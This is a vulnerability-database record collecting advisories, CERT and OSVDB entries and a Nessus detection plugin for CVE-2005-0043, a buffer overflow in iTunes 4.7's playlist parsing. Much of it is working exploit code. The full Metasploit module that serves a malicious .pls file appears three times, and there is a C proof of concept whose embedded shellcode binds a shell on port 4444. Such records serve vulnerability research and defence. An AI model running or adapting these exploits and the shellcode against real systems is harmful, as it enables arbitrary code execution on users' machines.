{"securityvulns": [{"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "Apple iTunes Playlist Parsing Buffer Overflow Vulnerability\r\n\r\niDEFENSE Security Advisory 01.13.05:\r\nhttp://www.idefense.com/application/poi/display?type=vulnerabilities\r\nJanuary 13, 2005\r\n\r\nI. BACKGROUND\r\n\r\nApple iTunes is a digital jukebox capable of playing a variety of sound\r\nfile formats, sharing music and burning music CD's. More information\r\nabout iTunes is available from:\r\n\r\n http://www.apple.com/itunes/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in Apple Computer\r\nInc.'s iTunes music player allows attackers to execute arbitrary code.\r\n\r\nThe problem specifically exists when parsing playlist files that contain\r\nlong URL file entries. Malicious playlist files can come with either the\r\n.m3u or .pls extension. Though their formats are different, the\r\nvulnerability in each is the same.\r\n\r\nAn example malicious .pls file with a long URL:\r\n\r\n [playlist]\r\n NumberOfEntries=1\r\n File1=http://[A x 3045]1234\r\n\r\nAn example malicious .m3u file with a long URL:\r\n\r\n http://[A x 3045]1234\r\n\r\nIn both cases '[A x 3045]' represents any string of 3,045 bytes in\r\nlength. Opening either malicious playlist file on the Microsoft Windows\r\nplatform will cause iTunes to crash with an access violation when\r\nattempting to execute instruction 0x34333231, which is the little-endian\r\nASCII code representation of '1234'. An attacker can exploit this\r\nvulnerability to redirect the flow of control and eventually execute\r\narbitrary code. While this example is specific to the Microsoft Windows\r\nplatform, exploitation on the Apple Mac OS platform is also possible.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of the described vulnerability allows remote attackers to\r\nexecute arbitrary code under the context of the user who started iTunes.\r\nExploitation requires that an attacker convince a target user to open a\r\nmalicious playlist file with a vulnerable version of iTunes.\r\n\r\nIV. DETECTION\r\n\r\niTunes 4.7 as installed on the Microsoft Windows and Apple Mac OS\r\nplatforms are affected. Earlier versions may also be susceptible.\r\n\r\nV. WORKAROUND\r\n\r\nDo not open playlist files from untrusted sources. Inspect the contents\r\nof .m3u and .pls playlist files for long URL file names prior to opening\r\nthem with iTunes.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThis vulnerability is addressed in iTunes 4.7.1.\r\n\r\niTunes 4.7.1 may be obtained from the Software Update pane in System\r\nPreferences, or Apple's iTunes download site:\r\n\r\n http://www.apple.com/itunes/download/\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nnames CAN-2005-0043 to these issues. This is a candidate for inclusion\r\nin the CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n12/17/2004 Initial vendor notification\r\n12/17/2004 Initial vendor response\r\n01/13/2004 Public disclosure\r\n\r\nIX. CREDIT\r\n\r\nSean de Regge (seanderegge[at]hotmail.com) is credited with this\r\ndiscovery.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2004 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.", "modified": "2005-01-14T00:00:00", "published": "2005-01-14T00:00:00", "id": "SECURITYVULNS:DOC:7588", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7588", "title": "iDEFENSE Security Advisory 01.13.05 - Apple iTunes Playlist Parsing Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2005-01-11 iTunes 4.7.1\r\n\r\niTunes 4.7.1 is now available and delivers the following security\r\nenhancement:\r\n\r\nCVE-ID: CAN-2005-0043\r\n\r\nImpact: Malicious playlists can cause iTunes to crash and could\r\nexecute arbitrary code\r\n\r\nDescription: iTunes supports several common playlist formats.\r\niTunes 4.7.1 fixes a buffer overflow in the parsing of m3u and pls\r\nplaylist files that could allow earlier versions of iTunes to crash\r\nand execute arbitrary code. Credit to Sean de Regge\r\n(seanderegge[at]hotmail.com) for discovering this issue, and to\r\niDEFENSE Labs for reporting it to us.\r\n\r\nAvailable for: Mac OS X, Microsoft Windows XP, Microsoft Windows\r\n2000\r\n\r\niTunes 4.7.1 may be obtained from the Software Update pane in System\r\nPreferences, or Apple's iTunes download site:\r\nhttp://www.apple.com/itunes/download/\r\n\r\nThe download file is named: "iTunes4.7.1.dmg"\r\nIts SHA-1 digest is: 2ae8c815f18756c24dfbc1ac7d837b75b828b92a\r\n\r\nInformation will also be posted to the Apple Product Security\r\nweb site:\r\nhttp://docs.info.apple.com/article.html?artnum=61798\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttp://www.apple.com/support/security/security_pgp.html\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQEVAwUBQeQviJyw5owIz4TQAQIMrgf/fYmI5LZy5DM5a61kbXgnzq5OpQQPaidH\r\ndisRa8UbjGrr+sSvEytQaxgO5vbDsZWgDGYeeaHTUeyiBdznO/b7X9moUC0uXEtC\r\n/a/CC2219AYeoQLJCMWhiIbrkL3OQ8QHoV3KaMlcg98tHgsrZKg1ssqEZszkjNrV\r\nJj1dm3hYn2/DHPqzhGy2+l4Lp/8Bdg2VwXJjCLrqD6cgcSAX0HVdVq+CM2VQ1DGH\r\nO9PjkspNxoTR2iV0VbJdc+q/Mi1HXlouNaURgR01oBYGqZoQ2mxYGMLIthgVoyri\r\nE/c5iyPq4lwDnhyjii4fajLO/3BW6MY7RVoNWv2ipYjVi1RPQ6d6iQ==\r\n=SryY\r\n-----END PGP SIGNATURE-----\r\n\r\n-- \r\nDavid Mirza Ahmad\r\nSymantec \r\n\r\nPGP: 0x26005712\r\n8D 9A B1 33 82 3D B3 D0 40 EB AB F0 1E 67 C6 1A 26 00 57 12", "modified": "2005-01-13T00:00:00", "published": "2005-01-13T00:00:00", "id": "SECURITYVULNS:DOC:7577", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7577", "title": "APPLE-SA-2005-01-11 iTunes 4.7.1", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in iTunes. iTunes fails to perform proper bounds checking on m3u/pls playlists, which may result in a buffer overflow. A remote attacker can create a specially crafted m3u/pls playlist which when executed by a local user can cause a buffer overflow resulting in a loss of integrity and/or availability.\n## Solution Description\nUpgrade to version 4.7.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in iTunes. iTunes fails to perform proper bounds checking on m3u/pls playlists, which may result in a buffer overflow. A remote attacker can create a specially crafted m3u/pls playlist which when executed by a local user can cause a buffer overflow resulting in a loss of integrity and/or availability.\n## References:\nVendor URL: http://www.apple.com/itunes/\nVendor Specific Solution URL: http://docs.info.apple.com/article.html?artnum=300667\nSecurity Tracker: 1012839\n[Secunia Advisory ID:13804](https://secuniaresearch.flexerasoftware.com/advisories/13804/)\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=180&type=vulnerabilities\nMail List Post: http://lists.apple.com/archives/security-announce/2005/Jan/msg00000.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0154.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0172.html\nKeyword: APPLE-SA-2005-01-11\nISS X-Force ID: 18851\n[CVE-2005-0043](https://vulners.com/cve/CVE-2005-0043)\n", "modified": "2005-01-11T17:13:36", "published": "2005-01-11T17:13:36", "href": "https://vulners.com/osvdb/OSVDB:12833", "id": "OSVDB:12833", "type": "osvdb", "title": "Apple iTunes m3u/pls Playlist Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2019-10-09T19:52:12", "bulletinFamily": "info", "description": "### Overview \n\nA buffer overflow vulnerability in iTunes could allow a remote attacker to execute arbitrary code.\n\n### Description \n\nApple [iTunes ](<http://www.apple.com/itunes/>)is a digital media player available for the Microsoft Windows and Mac OS X operating systems. It supports a variety of playlist formats including `.m3u` and `.pls`. A playlist allows a user to organize the order in which media files are played. In addition to media files, URLs to digital streams can be included in a playlist. There is a buffer overflow vulnerability in the way iTunes parses URL entries in `.m3u` and `.pls` playlist files. If a remote attacker creates a specially crafted playlist containing an overly long URL, a buffer overflow will occur and could lead to arbitrary code execution. \n \n--- \n \n### Impact \n\nBy convincing a user to load a specially crafted `.m3u` or `.pls` playlist file into iTunes, an attacker could execute arbitrary code with the privileges of the user. \n \n--- \n \n### Solution \n\n**Install Update**\n\n \nApple has addressed this issue in iTunes version 4.7.1. For further details, please refer to the iTunes 4.7.1 section in the Apple [Security Advisory](<http://docs.info.apple.com/article.html?artnum=61798>). \n \n--- \n \n### Vendor Information\n\n377368\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apple Computer Inc.\n\nUpdated: January 14, 2005 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease refer to the iTunes 4.7.1 section of the Apple [Security Advisory](<http://docs.info.apple.com/article.html?artnum=61798>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23377368 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://docs.info.apple.com/article.html?artnum=61798>\n * [http://idefense.com/application/poi/display?id=180&type=vulnerabilities&flashstatus=true](<http://idefense.com/application/poi/display?id=180&type=vulnerabilities&flashstatus=true>)\n * <http://secunia.com/advisories/13804/>\n\n### Acknowledgements\n\niDEFENSE credits Sean de Regge for reporting this vulnerability\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0043](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0043>) \n---|--- \n**Severity Metric:****** | 30.38 \n**Date Public:** | 2005-01-11 \n**Date First Published:** | 2005-01-14 \n**Date Last Updated: ** | 2005-01-14 18:26 UTC \n**Document Revision: ** | 12 \n", "modified": "2005-01-14T18:26:00", "published": "2005-01-14T00:00:00", "id": "VU:377368", "href": "https://www.kb.cert.org/vuls/id/377368", "type": "cert", "title": "Apple iTunes fails to properly handle overly long URLs in playlists", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-11-29T17:44:19", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.\n", "modified": "2017-07-24T13:26:21", "published": "2007-02-03T13:09:45", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/APPLE_ITUNES_PLAYLIST", "href": "", "type": "metasploit", "title": "Apple ITunes 4.7 Playlist Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple ITunes 4.7 Playlist Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Apple ITunes 4.7\n build 4.7.0.42. By creating a URL link to a malicious PLS\n file, a remote attacker could overflow a buffer and execute\n arbitrary code. When using this module, be sure to set the\n URIPATH with an extension of '.pls'.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'MC',\n 'References' =>\n [\n [ 'CVE', '2005-0043' ],\n [ 'OSVDB', '12833' ],\n [ 'BID', '12238' ],\n ],\n\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n\n 'Payload' =>\n {\n 'Space' => 500,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English SP4',\t{ 'Ret' => 0x75033083 } ],\n [ 'Windows XP Pro English SP2',\t\t{ 'Ret' => 0x77dc2063 } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 11 2005',\n 'DefaultTarget' => 0))\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n cruft = rand(9).to_s\n\n sploit = make_nops(2545) + payload.encoded + [target.ret].pack('V')\n\n # Build the HTML content\n content = \"[playlist]\\r\\n\" + \"NumberOfEntries=#{cruft}\\r\\n\"\n content << \"File#{cruft}=http://#{sploit}\"\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content, { 'Content-Type' => 'text/html' })\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/apple_itunes_playlist.rb"}], "exploitdb": [{"lastseen": "2016-01-31T12:48:12", "bulletinFamily": "exploit", "description": "Apple iTunes Playlist Local Parsing Buffer Overflow Exploit. CVE-2005-0043. Remote exploit for osx platform", "modified": "2005-01-16T00:00:00", "published": "2005-01-16T00:00:00", "id": "EDB-ID:758", "href": "https://www.exploit-db.com/exploits/758/", "type": "exploitdb", "title": "Apple iTunes Playlist Local Parsing Buffer Overflow Exploit", "sourceData": "/*\r\n * PoC for iTunes on OS X 10.3.7\r\n * -( nemo@felinemenace.org )-\r\n *\r\n * Generates a .pls file, when loaded in iTunes it\r\n * binds a shell to port 4444.\r\n * Shellcode contains no \\x00 or \\x0a's.\r\n *\r\n * sample output:\r\n *\r\n * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls\r\n * -( fm-eyetewnz )-\r\n * -( nemo@felinemenace.org )-\r\n * Creating file: foo.pls.\r\n * Bindshell on port: 4444\r\n * -[nemo@gir:~]$ open foo.pls\r\n * -[nemo@gir:~]$ nc localhost 4444\r\n * id\r\n * uid=501(nemo) gid=501(nemo) groups=501(nemo)\r\n *\r\n * Thanks to andrewg, mercy and core.\r\n * Greetings to pulltheplug and felinemenace.\r\n *\r\n * -( need a challenge? )-\r\n * -( http://pulltheplug.org )-\r\n */\r\n\r\n#include <stdio.h>\r\n#include <strings.h>\r\n\r\n#define BUFSIZE 1598 + 4\r\n\r\nchar shellcode[] = /* large ugly shellcode generated by http://metasploit.com */\r\n\"\\x7c\\xa5\\x2a\\x79\\x40\\x82\\xff\\xfd\\x7f\\xe8\\x02\\xa6\\x3b\\xff\\x07\\xfa\"\r\n\"\\x38\\xa5\\xf8\\x4a\\x3c\\xc0\\xee\\x83\\x60\\xc6\\xb7\\xfb\\x38\\x85\\x07\\xee\"\r\n\"\\x7c\\x89\\x03\\xa6\\x80\\x9f\\xf8\\x4a\\x7c\\x84\\x32\\x78\\x90\\x9f\\xf8\\x4a\"\r\n\"\\x7c\\x05\\xf8\\xac\\x7c\\xff\\x04\\xac\\x7c\\x05\\xff\\xac\\x3b\\xc5\\x07\\xba\"\r\n\"\\x7f\\xff\\xf2\\x15\\x42\\x20\\xff\\xe0\\x4c\\xff\\x01\\x2c\\xd6\\xe3\\xb7\\xf9\"\r\n\"\\xd6\\x03\\xb7\\xfa\\xd6\\x23\\xb7\\xfd\\xd6\\x83\\xb7\\x9a\\xaa\\x83\\xb7\\xf9\"\r\n\"\\x92\\x83\\xb5\\x83\\x92\\xfd\\xac\\x83\\xa6\\x83\\xb7\\xf6\\xee\\x81\\xa6\\xa7\"\r\n\"\\xee\\x83\\xb7\\xfb\\x92\\x0b\\xb5\\x5d\\xd6\\x23\\xb7\\xeb\\xd6\\x83\\xb7\\x93\"\r\n\"\\x91\\x40\\x44\\x83\\xaa\\x83\\xb7\\xf9\\x92\\x83\\xb5\\x83\\xd6\\x83\\xb7\\x91\"\r\n\"\\x91\\x40\\x44\\x83\\xaa\\x83\\xb7\\xf9\\x92\\x83\\xb5\\x83\\x91\\x40\\x44\\x83\"\r\n\"\\xd6\\x83\\xb7\\xe5\\xd6\\x03\\xb7\\xeb\\x7e\\x02\\x48\\x13\\xd6\\x22\\x48\\x13\"\r\n\"\\xd6\\x02\\x48\\x0b\\xaa\\x83\\xb7\\xf9\\x92\\x83\\xb5\\x83\\x92\\xfd\\xac\\x83\"\r\n\"\\xd6\\x23\\xb7\\xf9\\xd6\\x83\\xb7\\xa1\\x91\\x40\\x44\\x83\\x92\\x27\\x9c\\x83\"\r\n\"\\xaa\\x83\\xb7\\xf9\\x92\\x83\\xb5\\x83\\xd6\\x26\\x48\\x04\\xc2\\x86\\x48\\x04\"\r\n\"\\xae\\x01\\x48\\x1e\\xd6\\x83\\xb7\\xb9\\xaa\\x83\\xb7\\xf9\\x92\\x83\\xb5\\x83\"\r\n\"\\x92\\x26\\x9d\\x82\\xae\\x01\\x48\\x06\\x92\\xeb\\xb5\\x5d\\xd6\\xe0\\xb7\\xd3\"\r\n\"\\x7e\\xe2\\x48\\x03\\x7e\\x22\\x48\\x07\\xd6\\x02\\x48\\x03\\xd6\\x83\\xb7\\xc0\"\r\n\"\\x92\\x83\\xb3\\x57\\xaa\\x83\\xb7\\xf9\\x92\\x83\\xb5\\x83\\x91\\x63\\xb7\\xf3\"\r\n\"\\xc1\\xe1\\xde\\x95\\xc1\\xe0\\xc4\\x93\\xee\\x83\\xb7\\xfb\";\r\n\r\nint main(int ac, char **av)\r\n{\r\n int n,*p;\r\n unsigned char * q;\r\n char buf[BUFSIZE];\r\n FILE *pls;\r\n int offset=0x3DA8;\r\n char playlist[] = {\r\n \"[playlist]\\n\"\r\n \"NumberOfEntries=1\\n\"\r\n \"File1=http://\"\r\n };\r\n printf(\"-( fm-eyetewnz )-\\n\");\r\n printf(\"-( nemo@felinemenace.org )-\\n\");\r\n memset(buf,'\\x60',BUFSIZE);\r\n bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.\r\n q = buf + sizeof(buf) - 5;\r\n p = (int *)q;\r\n if(!(av[1])) {\r\n printf(\"usage: %s <filename (.pls)> [offset]\\n\",*av);\r\n exit(1);\r\n }\r\n if(av[2])\r\n offset = atoi(av[2]);\r\n *p = (0xc0000000 - offset);// 0xbfffc258;\r\n if(!(pls = fopen(*(av+1),\"w+\"))) {\r\n printf(\"error opening file: %s.\\n\", *(av +1));\r\n exit(1);\r\n }\r\n printf(\"Creating file: %s.\\n\",*(av+1));\r\n printf(\"Bindshell on port: 4444\\n\");\r\n fwrite(playlist,sizeof(playlist) - 1,1,pls);\r\n fwrite(buf,sizeof(buf) - 1,1,pls);\r\n fclose(pls);\r\n}\r\n\r\n// milw0rm.com [2005-01-16]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/758/"}, {"lastseen": "2016-02-02T00:08:33", "bulletinFamily": "exploit", "description": "Apple ITunes 4.7 Playlist Buffer Overflow. CVE-2005-0043. Local exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16562", "href": "https://www.exploit-db.com/exploits/16562/", "type": "exploitdb", "title": "Apple ITunes 4.7 Playlist Buffer Overflow", "sourceData": "##\r\n# $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apple ITunes 4.7 Playlist Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Apple ITunes 4.7\r\n\t\t\t\tbuild 4.7.0.42. By creating a URL link to a malicious PLS\r\n\t\t\t\tfile, a remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code. When using this module, be sure to set the\r\n\t\t\t\tURIPATH with an extension of '.pls'.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0043' ],\r\n\t\t\t\t\t[ 'OSVDB', '12833' ],\r\n\t\t\t\t\t[ 'BID', '12238' ],\r\n\t\t\t\t],\r\n\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro English SP4',\t{ 'Ret' => 0x75033083 } ],\r\n\t\t\t\t\t[ 'Windows XP Pro English SP2',\t\t{ 'Ret' => 0x77dc2063 } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jan 11 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\tcruft = rand(9).to_s\r\n\r\n\t\tsploit = make_nops(2545) + payload.encoded + [target.ret].pack('V')\r\n\r\n\t\t# Build the HTML content\r\n\t\tcontent = \"[playlist]\\r\\n\" + \"NumberOfEntries=#{cruft}\\r\\n\"\r\n\t\tcontent << \"File#{cruft}=http://#{sploit}\"\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content, { 'Content-Type' => 'text/html' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16562/"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:02", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83127/Apple-ITunes-4.7-Playlist-Buffer-Overflow.html", "id": "PACKETSTORM:83127", "type": "packetstorm", "title": "Apple ITunes 4.7 Playlist Buffer Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apple ITunes 4.7 Playlist Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Apple ITunes 4.7 \nbuild 4.7.0.42. By creating a URL link to a malicious PLS \nfile, a remote attacker could overflow a buffer and execute \narbitrary code. When using this module, be sure to set the \nURIPATH with an extension of '.pls'. \n}, \n'License' => MSF_LICENSE, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-0043' ], \n[ 'OSVDB', '12833' ], \n[ 'BID', '12238' ], \n], \n \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 Pro English SP4', { 'Ret' => 0x75033083 } ], \n[ 'Windows XP Pro English SP2', { 'Ret' => 0x77dc2063 } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 11 2005', \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ncruft = rand(9).to_s \n \nsploit = make_nops(2545) + payload.encoded + [target.ret].pack('V') \n \n# Build the HTML content \ncontent = \"[playlist]\\r\\n\" + \"NumberOfEntries=#{cruft}\\r\\n\" \ncontent << \"File#{cruft}=http://#{sploit}\" \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content, { 'Content-Type' => 'text/html' }) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83127/apple_itunes_playlist.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-10-28T20:39:36", "bulletinFamily": "scanner", "description": "The remote host is running a version of iTunes which is older than\nversion 4.7.1. The remote version of this software is vulnerable\nto a buffer overflow when it parses a malformed playlist file\n(.m3u or .pls files). A remote attacker could exploit this by\ntricking a user into opening a maliciously crafted file, resulting\nin arbitrary code execution.", "modified": "2005-01-13T00:00:00", "id": "MACOSX_ITUNES_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/16151", "published": "2005-01-13T00:00:00", "title": "iTunes < 4.7.1", "type": "nessus", "sourceData": "#TRUSTED 5f8b76d3ec6c6e046ef9cd51927ee72bf280bdb92a022051fbbb384067c04e1c85b2aa7c2649451e8226655dec427e0c82d4591f850a56c6429dbf3ac93899680da241b2eb831dd7d0d392648604cebb28f83913022f2b9576235d3daffff49401511cea11483f29d8700667d5147124132b03fe762d6133832b12764e7ee811eb1373829e344b721185c7816b99927e3bf1079186663bb5bf4a9e3100993ebeac12e0ebf3ca5ea1c3f66fab48b1e746ebe32dd939ba8bc080fcf97caa838c8803b17f76212232fb24254d9288d3f6d1019e3b4226f814c1da64d01133d9a1d9be0a7c14caa095ea5e29f6aecc270f8e28cb5dd232ec702a068e8c719d1a261b63861705ec6d7a06681afc6a4d8fb4fa3f35b3884cf29c2f720c1c7cbf9b9d0af830a20c7a88026addd1d2cb6b696f80bfa41ab8f2904fb9f0d13f33423cb245a215d31274745fb60e822fedd173621fbd939f18703d3c42399ca3bf046a2bf95598d8fd63fd1b1ac2d1e7c35908b4b29152b8b2a1b23ccb671cdd8d5a350d308b2c685a8c12bbc3036830c89c7033e5c35c1d05e715ace20e654df597458f7629e0722d33599d29d1dbadb4da8e74811633f8964e2b325d26300cb2d8a5288f9c91ee9ff569d4d04d3954dba077db7f430290a5f371846087d3f0e8477deaf0c9fa32fd82a9bde0028d700d3d6848cce5d563a7f726540644e3fad8311f0659\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16151);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\"CVE-2005-0043\");\n script_bugtraq_id(12238);\n script_xref(name:\"Secunia\", value:\"13804\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2005-01-11\");\n\n script_name(english:\"iTunes < 4.7.1\");\n script_summary(english:\"Check the version of iTunes\");\n\n script_set_attribute( attribute:\"synopsis\", 